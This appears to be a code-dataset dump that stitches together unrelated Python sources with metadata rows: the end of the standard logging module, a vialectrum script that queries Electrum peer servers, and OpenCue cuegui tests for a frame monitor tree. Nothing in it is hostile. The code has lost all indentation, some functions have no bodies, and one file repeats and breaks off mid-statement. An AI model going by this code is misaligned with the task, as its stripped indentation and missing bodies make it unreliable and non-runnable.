def setLoggerClass(self, klass):
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
self.logRecordFactory = factory
def _fixupParents(self, alogger):
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
def _clear_cache(self):
_acquireLock()
for logger in self.loggerDict.values():
if isinstance(logger, Logger):
logger._cache.clear()
self.root._cache.clear()
_releaseLock()
class Logger(Filterer):
def __init__(self, name, level=NOTSET):
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
self._cache = {}
def setLevel(self, level):
self.level = _checkLevel(level)
self.manager._clear_cache()
def debug(self, msg, *args, **kwargs):
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
self.error(msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
def fatal(self, msg, *args, **kwargs):
self.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False, stacklevel=1):
f = currentframe()
if f is not None:
f = f.f_back
orig_f = f
while f and stacklevel > 1:
f = f.f_back
stacklevel -= 1
if not f:
f = orig_f
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False,
stacklevel=1):
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
try:
fn, lno, func, sinfo = self.findCaller(stack_info, stacklevel)
except ValueError:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if isinstance(exc_info, BaseException):
exc_info = (type(exc_info), exc_info, exc_info.__traceback__)
elif not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
if self.disabled:
return False
try:
return self._cache[level]
except KeyError:
_acquireLock()
try:
if self.manager.disable >= level:
is_enabled = self._cache[level] = False
else:
is_enabled = self._cache[level] = (
level >= self.getEffectiveLevel()
)
finally:
_releaseLock()
return is_enabled
def getChild(self, suffix):
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
def __repr__(self):
level = getLevelName(self.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, self.name, level)
def __reduce__(self):
if getLogger(self.name) is not self:
import pickle
raise pickle.PicklingError('logger cannot be pickled')
return getLogger, (self.name,)
class RootLogger(Logger):
def __init__(self, level):
Logger.__init__(self, "root", level)
def __reduce__(self):
return getLogger, ()
_loggerClass = Logger
class LoggerAdapter(object):
def __init__(self, logger, extra=None):
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
kwargs["extra"] = self.extra
return msg, kwargs
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, exc_info=True, **kwargs):
self.log(ERROR, msg, *args, exc_info=exc_info, **kwargs)
def critical(self, msg, *args, **kwargs):
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def isEnabledFor(self, level):
return self.logger.isEnabledFor(level)
def setLevel(self, level):
self.logger.setLevel(level)
def getEffectiveLevel(self):
return self.logger.getEffectiveLevel()
def hasHandlers(self):
return self.logger.hasHandlers()
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
return self.logger._log(
level,
msg,
args,
exc_info=exc_info,
extra=extra,
stack_info=stack_info,
)
@property
def manager(self):
return self.logger.manager
@manager.setter
def manager(self, value):
self.logger.manager = value
@property
def name(self):
return self.logger.name
def __repr__(self):
logger = self.logger
level = getLevelName(logger.getEffectiveLevel())
return '<%s %s (%s)>' % (self.__class__.__name__, logger.name, level)
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
def basicConfig(**kwargs):
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
force = kwargs.pop('force', False)
encoding = kwargs.pop('encoding', None)
errors = kwargs.pop('errors', 'backslashreplace')
if force:
for h in root.handlers[:]:
root.removeHandler(h)
h.close()
if len(root.handlers) == 0:
handlers = kwargs.pop("handlers", None)
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.pop("filename", None)
mode = kwargs.pop("filemode", 'a')
if filename:
if 'b'in mode:
errors = None
h = FileHandler(filename, mode,
encoding=encoding, errors=errors)
else:
stream = kwargs.pop("stream", None)
h = StreamHandler(stream)
handlers = [h]
dfs = kwargs.pop("datefmt", None)
style = kwargs.pop("style", '%')
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
fs = kwargs.pop("format", _STYLES[style][1])
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.pop("level", None)
if level is not None:
root.setLevel(level)
if kwargs:
keys = ', '.join(kwargs.keys())
raise ValueError('Unrecognised argument(s): %s' % keys)
finally:
_releaseLock()
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
if not name or isinstance(name, str) and name == root.name:
return root
return Logger.manager.getLogger(name)
def critical(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
def fatal(msg, *args, **kwargs):
critical(msg, *args, **kwargs)
def error(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, exc_info=True, **kwargs):
error(msg, *args, exc_info=exc_info, **kwargs)
def warning(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level=CRITICAL):
root.manager.disable = level
root.manager._clear_cache()
def shutdown(handlerList=_handlerList):
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (OSError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except: # ignore everything, as we're shutting down
if raiseExceptions:
raise
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
def handle(self, record):
def emit(self, record):
def createLock(self):
self.lock = None
def _at_fork_reinit(self):
pass
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
| true
| true
|
1c446fe63b5d182b69d71768d1bb0b75c5c60426
| 3,049
|
py
|
Python
|
scripts/util.py
|
TheCharlatan/vialectrum
|
c54cd9aa08835db985d77ead9d91a00d66afa4b0
|
[
"MIT"
] | null | null | null |
scripts/util.py
|
TheCharlatan/vialectrum
|
c54cd9aa08835db985d77ead9d91a00d66afa4b0
|
[
"MIT"
] | null | null | null |
scripts/util.py
|
TheCharlatan/vialectrum
|
c54cd9aa08835db985d77ead9d91a00d66afa4b0
|
[
"MIT"
] | null | null | null |
import select, time, queue
# import vialectrum as electrum
from vialectrum import Connection, Interface, SimpleConfig
from vialectrum.network import parse_servers
from collections import defaultdict
# electrum.util.set_verbosity(1)
def get_interfaces(servers, timeout=10):
'''Returns a map of servers to connected interfaces. If any
connections fail or timeout, they will be missing from the map.
'''
socket_queue = queue.Queue()
config = SimpleConfig()
connecting = {}
for server in servers:
if server not in connecting:
connecting[server] = Connection(server, socket_queue, config.path)
interfaces = {}
timeout = time.time() + timeout
count = 0
while time.time() < timeout and count < len(servers):
try:
server, socket = socket_queue.get(True, 0.3)
except queue.Empty:
continue
if socket:
interfaces[server] = Interface(server, socket)
count += 1
return interfaces
def wait_on_interfaces(interfaces, timeout=10):
'''Return a map of servers to a list of (request, response) tuples.
Waits timeout seconds, or until each interface has a response'''
result = defaultdict(list)
timeout = time.time() + timeout
while len(result) < len(interfaces) and time.time() < timeout:
rin = [i for i in interfaces.values()]
win = [i for i in interfaces.values() if i.unsent_requests]
rout, wout, xout = select.select(rin, win, [], 1)
for interface in wout:
interface.send_requests()
for interface in rout:
responses = interface.get_responses()
if responses:
result[interface.server].extend(responses)
return result
def get_peers():
config = SimpleConfig()
peers = {}
# 1. get connected interfaces
server = config.get('server')
interfaces = get_interfaces([server])
if not interfaces:
print("No connection to", server)
return []
# 2. get list of peers
interface = interfaces[server]
interface.queue_request('server.peers.subscribe', [], 0)
responses = wait_on_interfaces(interfaces).get(server)
if responses:
response = responses[0][1] # One response, (req, response) tuple
peers = parse_servers(response.get('result'))
return peers
def send_request(peers, method, params):
print("Contacting %d servers"%len(peers))
interfaces = get_interfaces(peers)
print("%d servers could be reached" % len(interfaces))
for peer in peers:
if not peer in interfaces:
print("Connection failed:", peer)
for msg_id, i in enumerate(interfaces.values()):
i.queue_request(method, params, msg_id)
responses = wait_on_interfaces(interfaces)
for peer in interfaces:
if not peer in responses:
print(peer, "did not answer")
results = dict(zip(responses.keys(), [t[0][1].get('result') for t in responses.values()]))
print("%d answers"%len(results))
return results
| 36.297619
| 94
| 0.653329
|
import select, time, queue
from vialectrum import Connection, Interface, SimpleConfig
from vialectrum.network import parse_servers
from collections import defaultdict
def get_interfaces(servers, timeout=10):
socket_queue = queue.Queue()
config = SimpleConfig()
connecting = {}
for server in servers:
if server not in connecting:
connecting[server] = Connection(server, socket_queue, config.path)
interfaces = {}
timeout = time.time() + timeout
count = 0
while time.time() < timeout and count < len(servers):
try:
server, socket = socket_queue.get(True, 0.3)
except queue.Empty:
continue
if socket:
interfaces[server] = Interface(server, socket)
count += 1
return interfaces
def wait_on_interfaces(interfaces, timeout=10):
result = defaultdict(list)
timeout = time.time() + timeout
while len(result) < len(interfaces) and time.time() < timeout:
rin = [i for i in interfaces.values()]
win = [i for i in interfaces.values() if i.unsent_requests]
rout, wout, xout = select.select(rin, win, [], 1)
for interface in wout:
interface.send_requests()
for interface in rout:
responses = interface.get_responses()
if responses:
result[interface.server].extend(responses)
return result
def get_peers():
config = SimpleConfig()
peers = {}
server = config.get('server')
interfaces = get_interfaces([server])
if not interfaces:
print("No connection to", server)
return []
interface = interfaces[server]
interface.queue_request('server.peers.subscribe', [], 0)
responses = wait_on_interfaces(interfaces).get(server)
if responses:
response = responses[0][1]
peers = parse_servers(response.get('result'))
return peers
def send_request(peers, method, params):
print("Contacting %d servers"%len(peers))
interfaces = get_interfaces(peers)
print("%d servers could be reached" % len(interfaces))
for peer in peers:
if not peer in interfaces:
print("Connection failed:", peer)
for msg_id, i in enumerate(interfaces.values()):
i.queue_request(method, params, msg_id)
responses = wait_on_interfaces(interfaces)
for peer in interfaces:
if not peer in responses:
print(peer, "did not answer")
results = dict(zip(responses.keys(), [t[0][1].get('result') for t in responses.values()]))
print("%d answers"%len(results))
return results
| true
| true
|
1c447221d6f4f975dfff9f8ae842a6682412100a
| 8,187
|
py
|
Python
|
cuegui/tests/FrameMonitorTree_tests.py
|
srbhss/OpenCue
|
c0b8aeab0ea324c3c46541d98b4a968230c668eb
|
[
"Apache-2.0"
] | null | null | null |
cuegui/tests/FrameMonitorTree_tests.py
|
srbhss/OpenCue
|
c0b8aeab0ea324c3c46541d98b4a968230c668eb
|
[
"Apache-2.0"
] | 2
|
2019-10-02T23:58:20.000Z
|
2020-03-30T19:18:48.000Z
|
cuegui/tests/FrameMonitorTree_tests.py
|
srbhss/OpenCue
|
c0b8aeab0ea324c3c46541d98b4a968230c668eb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018 Sony Pictures Imageworks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
import PySide2.QtCore
import PySide2.QtGui
import PySide2.QtTest
import PySide2.QtWidgets
import cuegui.Constants
import cuegui.FrameMonitor
import cuegui.FrameMonitorTree
import cuegui.Main
import cuegui.plugins.MonitorJobDetailsPlugin
import cuegui.Style
import opencue.compiled_proto.job_pb2
import opencue.wrappers.frame
import opencue.wrappers.job
from . import test_utils
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
class FrameMonitorTreeTests(unittest.TestCase):
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
def setUp(self):
test_utils.createApplication()
PySide2.QtGui.qApp.settings = PySide2.QtCore.QSettings()
cuegui.Style.init()
self.parentWidget = PySide2.QtWidgets.QWidget()
self.frameMonitorTree = cuegui.FrameMonitorTree.FrameMonitorTree(self.parentWidget)
self.job = opencue.wrappers.job.Job(opencue.compiled_proto.job_pb2.Job(id='foo'))
self.frameMonitorTree.setJob(self.job)
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames', autospec=True)
def test_tickInitialLoad(self, getFramesMock):
frames = [
opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(name='frame1')),
opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(name='frame2'))]
getFramesMock.return_value = frames
self.frameMonitorTree.tick()
getFramesMock.assert_called_with(self.job)
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames')
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames')
def test_tickNoUpdate(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
# Initial load.
self.frameMonitorTree.tick()
getFramesMock.reset_mock()
getUpdatedFramesMock.reset_mock()
self.frameMonitorTree.tick()
getFramesMock.assert_not_called()
getUpdatedFramesMock.assert_not_called()
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames', autospec=True)
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames')
def test_tickUpdateChanged(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
getUpdatedResponse = opencue.compiled_proto.job_pb2.JobGetUpdatedFramesResponse(
state=opencue.compiled_proto.job_pb2.RUNNING,
server_time=1000,
updated_frames=opencue.compiled_proto.job_pb2.UpdatedFrameSeq(
updated_frames=[opencue.compiled_proto.job_pb2.UpdatedFrame(id='foo')]))
getUpdatedFramesMock.return_value = getUpdatedResponse
# Initial load.
self.frameMonitorTree.tick()
getFramesMock.reset_mock()
self.frameMonitorTree.updateChangedRequest()
self.frameMonitorTree.tick()
getFramesMock.assert_not_called()
getUpdatedFramesMock.assert_called_with(self.job, mock.ANY)
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames')
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames', autospec=True)
def test_tickFullUpdate(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
getUpdatedResponse = opencue.compiled_proto.job_pb2.JobGetUpdatedFramesResponse(
state=opencue.compiled_proto.job_pb2.RUNNING,
server_time=1000,
updated_frames=opencue.compiled_proto.job_pb2.UpdatedFrameSeq(
updated_frames=[opencue.compiled_proto.job_pb2.UpdatedFrame(id='foo')]))
getUpdatedFramesMock.return_value = getUpdatedResponse
# Initial load.
self.frameMonitorTree.tick()
self.frameMonitorTree.updateRequest()
self.frameMonitorTree.tick()
getFramesMock.assert_called_with(self.job)
getUpdatedFramesMock.assert_not_called()
def test_getCores(self):
frame = opencue.wrappers.frame.Frame(opencue.compiled_proto.job_pb2.Frame(last_resource='foo/125.82723'))
self.assertEqual(125.82723, self.frameMonitorTree.getCores(frame))
self.assertEqual('125.83', self.frameMonitorTree.getCores(frame, format=True))
@mock.patch.object(cuegui.FrameMonitorTree.FrameContextMenu, 'exec_')
def test_rightClickItem(self, execMock):
mouse_position = PySide2.QtCore.QPoint()
self.frameMonitorTree.contextMenuEvent(
PySide2.QtGui.QContextMenuEvent(
PySide2.QtGui.QContextMenuEvent.Reason.Mouse, mouse_position, mouse_position))
execMock.assert_called_with(mouse_position)
class FrameWidgetItemTests(unittest.TestCase):
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
def setUp(self):
self.host_name = 'arbitrary-hostname'
self.dispatch_order = 285
self.state = opencue.compiled_proto.job_pb2.RUNNING
self.frame = opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(
name='frame1',
last_resource='{}/foo'.format(self.host_name),
dispatch_order=self.dispatch_order,
state=self.state,
checkpoint_state=opencue.compiled_proto.job_pb2.ENABLED))
# The widget needs a var, otherwise it gets garbage-collected before tests can run.
parentWidget = PySide2.QtWidgets.QWidget()
self.frameWidgetItem = cuegui.FrameMonitorTree.FrameWidgetItem(
self.frame,
cuegui.FrameMonitorTree.FrameMonitorTree(parentWidget),
opencue.wrappers.job.Job(opencue.compiled_proto.job_pb2.Job(id='unused-job-id')))
def test_data(self):
cuegui.FrameMonitorTree.LOCALRESOURCE = '{}/'.format(self.host_name)
dispatch_order_col = 0
self.assertEqual(
self.dispatch_order,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.DisplayRole))
self.assertEqual(
cuegui.Style.ColorTheme.COLOR_JOB_FOREGROUND,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.FrameMonitorTree.QCOLOR_BLACK,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.FrameMonitorTree.QCOLOR_GREEN,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.PROC_COLUMN, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.Constants.RGB_FRAME_STATE[self.state],
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.BackgroundRole))
self.assertEqual(
PySide2.QtGui.QIcon,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.CHECKPOINT_COLUMN,
PySide2.QtCore.Qt.DecorationRole).__class__)
self.assertEqual(
PySide2.QtCore.Qt.AlignCenter,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.TextAlignmentRole))
self.assertEqual(
PySide2.QtCore.Qt.AlignRight,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.PROC_COLUMN, PySide2.QtCore.Qt.TextAlignmentRole))
self.assertEqual(
cuegui.Constants.TYPE_FRAME,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.UserRole))
if __name__ == '__main__':
unittest.main()
| 39.360577
| 113
| 0.702333
|
import mock
import unittest
import PySide2.QtCore
import PySide2.QtGui
import PySide2.QtTest
import PySide2.QtWidgets
import cuegui.Constants
import cuegui.FrameMonitor
import cuegui.FrameMonitorTree
import cuegui.Main
import cuegui.plugins.MonitorJobDetailsPlugin
import cuegui.Style
import opencue.compiled_proto.job_pb2
import opencue.wrappers.frame
import opencue.wrappers.job
from . import test_utils
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
class FrameMonitorTreeTests(unittest.TestCase):
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
def setUp(self):
test_utils.createApplication()
PySide2.QtGui.qApp.settings = PySide2.QtCore.QSettings()
cuegui.Style.init()
self.parentWidget = PySide2.QtWidgets.QWidget()
self.frameMonitorTree = cuegui.FrameMonitorTree.FrameMonitorTree(self.parentWidget)
self.job = opencue.wrappers.job.Job(opencue.compiled_proto.job_pb2.Job(id='foo'))
self.frameMonitorTree.setJob(self.job)
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames', autospec=True)
def test_tickInitialLoad(self, getFramesMock):
frames = [
opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(name='frame1')),
opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(name='frame2'))]
getFramesMock.return_value = frames
self.frameMonitorTree.tick()
getFramesMock.assert_called_with(self.job)
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames')
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames')
def test_tickNoUpdate(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
self.frameMonitorTree.tick()
getFramesMock.reset_mock()
getUpdatedFramesMock.reset_mock()
self.frameMonitorTree.tick()
getFramesMock.assert_not_called()
getUpdatedFramesMock.assert_not_called()
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames', autospec=True)
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames')
def test_tickUpdateChanged(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
getUpdatedResponse = opencue.compiled_proto.job_pb2.JobGetUpdatedFramesResponse(
state=opencue.compiled_proto.job_pb2.RUNNING,
server_time=1000,
updated_frames=opencue.compiled_proto.job_pb2.UpdatedFrameSeq(
updated_frames=[opencue.compiled_proto.job_pb2.UpdatedFrame(id='foo')]))
getUpdatedFramesMock.return_value = getUpdatedResponse
self.frameMonitorTree.tick()
getFramesMock.reset_mock()
self.frameMonitorTree.updateChangedRequest()
self.frameMonitorTree.tick()
getFramesMock.assert_not_called()
getUpdatedFramesMock.assert_called_with(self.job, mock.ANY)
@mock.patch.object(opencue.wrappers.job.Job, 'getUpdatedFrames')
@mock.patch.object(opencue.wrappers.job.Job, 'getFrames', autospec=True)
def test_tickFullUpdate(self, getFramesMock, getUpdatedFramesMock):
getFramesMock.return_value = []
getUpdatedResponse = opencue.compiled_proto.job_pb2.JobGetUpdatedFramesResponse(
state=opencue.compiled_proto.job_pb2.RUNNING,
server_time=1000,
updated_frames=opencue.compiled_proto.job_pb2.UpdatedFrameSeq(
updated_frames=[opencue.compiled_proto.job_pb2.UpdatedFrame(id='foo')]))
getUpdatedFramesMock.return_value = getUpdatedResponse
self.frameMonitorTree.tick()
self.frameMonitorTree.updateRequest()
self.frameMonitorTree.tick()
getFramesMock.assert_called_with(self.job)
getUpdatedFramesMock.assert_not_called()
def test_getCores(self):
frame = opencue.wrappers.frame.Frame(opencue.compiled_proto.job_pb2.Frame(last_resource='foo/125.82723'))
self.assertEqual(125.82723, self.frameMonitorTree.getCores(frame))
self.assertEqual('125.83', self.frameMonitorTree.getCores(frame, format=True))
@mock.patch.object(cuegui.FrameMonitorTree.FrameContextMenu, 'exec_')
def test_rightClickItem(self, execMock):
mouse_position = PySide2.QtCore.QPoint()
self.frameMonitorTree.contextMenuEvent(
PySide2.QtGui.QContextMenuEvent(
PySide2.QtGui.QContextMenuEvent.Reason.Mouse, mouse_position, mouse_position))
execMock.assert_called_with(mouse_position)
class FrameWidgetItemTests(unittest.TestCase):
@mock.patch('opencue.cuebot.Cuebot.getStub', new=mock.Mock())
def setUp(self):
self.host_name = 'arbitrary-hostname'
self.dispatch_order = 285
self.state = opencue.compiled_proto.job_pb2.RUNNING
self.frame = opencue.wrappers.frame.Frame(
opencue.compiled_proto.job_pb2.Frame(
name='frame1',
last_resource='{}/foo'.format(self.host_name),
dispatch_order=self.dispatch_order,
state=self.state,
checkpoint_state=opencue.compiled_proto.job_pb2.ENABLED))
parentWidget = PySide2.QtWidgets.QWidget()
self.frameWidgetItem = cuegui.FrameMonitorTree.FrameWidgetItem(
self.frame,
cuegui.FrameMonitorTree.FrameMonitorTree(parentWidget),
opencue.wrappers.job.Job(opencue.compiled_proto.job_pb2.Job(id='unused-job-id')))
def test_data(self):
cuegui.FrameMonitorTree.LOCALRESOURCE = '{}/'.format(self.host_name)
dispatch_order_col = 0
self.assertEqual(
self.dispatch_order,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.DisplayRole))
self.assertEqual(
cuegui.Style.ColorTheme.COLOR_JOB_FOREGROUND,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.FrameMonitorTree.QCOLOR_BLACK,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.FrameMonitorTree.QCOLOR_GREEN,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.PROC_COLUMN, PySide2.QtCore.Qt.ForegroundRole))
self.assertEqual(
cuegui.Constants.RGB_FRAME_STATE[self.state],
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.BackgroundRole))
self.assertEqual(
PySide2.QtGui.QIcon,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.CHECKPOINT_COLUMN,
PySide2.QtCore.Qt.DecorationRole).__class__)
self.assertEqual(
PySide2.QtCore.Qt.AlignCenter,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.STATUS_COLUMN, PySide2.QtCore.Qt.TextAlignmentRole))
self.assertEqual(
